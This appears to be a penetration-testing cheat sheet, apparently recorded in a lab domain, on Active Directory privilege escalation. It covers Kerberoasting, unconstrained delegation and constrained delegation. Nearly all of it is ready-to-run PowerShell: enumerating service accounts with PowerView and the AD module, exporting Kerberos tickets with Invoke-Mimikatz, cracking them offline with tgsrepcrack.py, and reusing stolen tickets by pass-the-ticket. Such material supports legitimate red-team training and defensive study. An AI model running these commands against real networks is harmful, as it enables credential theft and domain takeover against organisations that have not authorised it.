Domain Privilege Escalation

Domain Priv Escalation : Kerberoast:-

Find service account:

GetUserSPNs

https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1

Powerview:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetUser –SPN

Active directory Module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADUser -filter {ServicePrincipalName -ne “$null”} -Properties serviceprincipalname

If we are getting error of “You cannot call a method on a null-valued expression”

Then use below command to over come the issue:

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master\ActiveDirectory> Install-Module Pester -Force -Verbose –SkipPublisherCheck4

PS C:\Users\victim6\Downloads\scripts-master\scripts-master> $client -eq $null

https://github.com/brianary/scripts

PS C:\Users\victim6\Downloads\scripts-master\scripts-master> Import-Module .\Install-ActiveDirectoryModule.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> help .\Install-ActiveDirectoryModule.ps1 –Examples

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Install-ActiveDirectoryModule -dllpath C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master\Microsoft.ActiveDirectory.Management.dll -admodulepath C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Add-Type -AssemblyName system.IdentityModel

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> New-Object System.IdentityModel.Tokens.KerberosReceiverSecurityToken -ArgumentList “WIN-2RUMVG5JPOC.security.local”

PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> klist

Export all tickets using mimikatz :

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Import-Module .\Invoke-Mimikatz.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘

Export all tickets using mimikatz:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Import-Module .\Invoke-Mimikatz.ps1 PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘

Crack the service account password:

PS C:\Program Files (x86)\Python37-32> .\python.exe C:\Users\victim6\Downloads\new\new\tool\tool\kerberoast-master\kerberoast-master\tgsrepcrack.py C:\Users\victim6\Downloads\new\new\tool\tool\kerberoast-master\kerberoast-master\10k-worst-passwords.txt ‘2-40a50000-Administrator@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi’

Unconstrained delegation:

Discover domain computers which have unconstrained delegation enabled using powerview:-

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> import-module .\powerview.psm1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained

Using Active directory module :

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADComputer -Filter {TrustedForDelegation -eq $True}

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -filter {TrustedForDelegation -eq $True}

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::tickets /export”‘

The ticket can be reused :

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”kerberos::ptt [0;1b6e65]-0-0-40a50000-Administrator@ldap-WIN-2RUMVG5JPOC.security.local.kirbi”‘

Constrained Delegation:

Using Powerview(dev):

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-Domainuser -TrustedToAuth

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-DomainComputer –TrustedToAuth

Using Active Directory Module:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne “$null”} -Properties msDS-allowedToDelegateTo

Try this:

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> . .\powerview_dev.ps1

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-Domainuser -TrustedToAuth

PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-DomainComputer –TrustedToAuth

@Saksham Dixit